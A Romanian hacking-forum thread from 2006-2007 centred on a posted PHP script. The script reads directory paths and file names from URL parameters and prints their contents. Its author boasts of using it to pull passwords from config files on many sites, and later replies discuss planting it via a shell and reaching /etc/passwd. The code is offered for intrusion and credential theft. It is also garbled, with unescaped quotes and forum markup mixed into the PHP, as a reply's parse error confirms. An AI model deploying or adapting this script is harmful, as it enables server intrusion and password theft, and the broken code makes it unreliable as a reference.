my php hack script

zbeng · October 18, 2006

Acesta este un banal script in php cu care poti sa "hacuiesti" un ROOT de pe linux si/sau de windous , in alte cuvinte iti arata sursa fisierului php, si tot ce ai prin directorul ROOT de pe linuics, sau de pe uindous , eu am aflat parola din config la multe situri :@....

Atentie fisierul trebuie sa fie pe acel server :@ altfel nu va merge


<?
// scripul e sub licenta GNU made by necenzurat


echo "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">n";
echo "<html lang='en'>n";
echo "<head>n";
echo "<title></title>n";
echo "<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>n";
echo "</head>n";
echo "<body>n";

$mode = $_GET['mode'];
$cat = $_GET['cat'];
$dir = $_GET['dir'];


if($mode=="")
{
echo"<center>n";
echo"<a href=?mode=list>Intra da ai GRIJA, nu stii ce se poate intampla dincolo de usa cu bolta </a>n";
echo"</center>n";
}

elseif($mode=="steal")
{


if($cat=="")
{
$cat="xs.php";
}

$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "Kb";

echo"<table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table></center>";
echo "</body></html>";
}
elseif($mode=="list")
{

echo"<title>Afisare de directoare</title>";
$base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/'));

if($dir=="")
{
$dir="./";
}
$path = $dir;

function after ($this, $inthat)
   {
       if (!is_bool(strpos($inthat, $this)))
       return substr($inthat, strpos($inthat,$this)+strlen($this));
   }

echo "<center>[B]$dir[/B]</font></center><table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("Nu se poate paci :(");
while (false !== ($file = readdir($dir_handle))) {
$link = "[url="?mode=steal&cat=$dir/$file><font"]$file</font>[/url]
";
$formato = after('.', $file);

If($formato==".") {
$link = "<a href=?mode=list&dir=$dir/$file>Directorul precedent</a>
";
}

If($formato=="") {
$link = "[url="?mode=list&dir=$dir/$file><font"]$file</font>[/url]
";
}

echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table>";
}
?>

bye necenzurat

Jeefo · November 12, 2007

Pai si cum il bag pe acel site??? :?:

d3v1l · November 14, 2007

Pai si cum il bag pe acel site??? :?:

incerca un shell

em · December 3, 2007

Scriptul are erori.

Parse error: syntax error, unexpected T_ECHO in /storage0/home/eminemix.evonet.ro/www/gg.php on line 7

Chiar dupa corectare nu merge cum spui tu (sau nu l-ai facut sa treaca de safe mode)

SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access ../../../../../etc/passwd owned by uid 0 in /storage0/home/blabla on line 39

December 3, 2007

Scriptul are erori.
Parse error: syntax error, unexpected T_ECHO in /storage0/home/eminemix.evonet.ro/www/gg.php on line 7
Chiar dupa corectare nu merge cum spui tu (sau nu l-ai facut sa treaca de safe mode)
SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access ../../../../../etc/passwd owned by uid 0 in /storage0/home/blabla on line 39

serverele care ofera FREE HOSTING au o gramada de functii disabled si o gramada mai mare de fisiere restrictionate tocmai din cauza celor ca tine.

("celor ca tine" = cei care incearca scripturi de hack pe servere free)

Sign In

my php hack script

Recommended Posts

zbeng

Jeefo

d3v1l

em

Guest BanKai

Join the conversation

Browse

Activity

Pages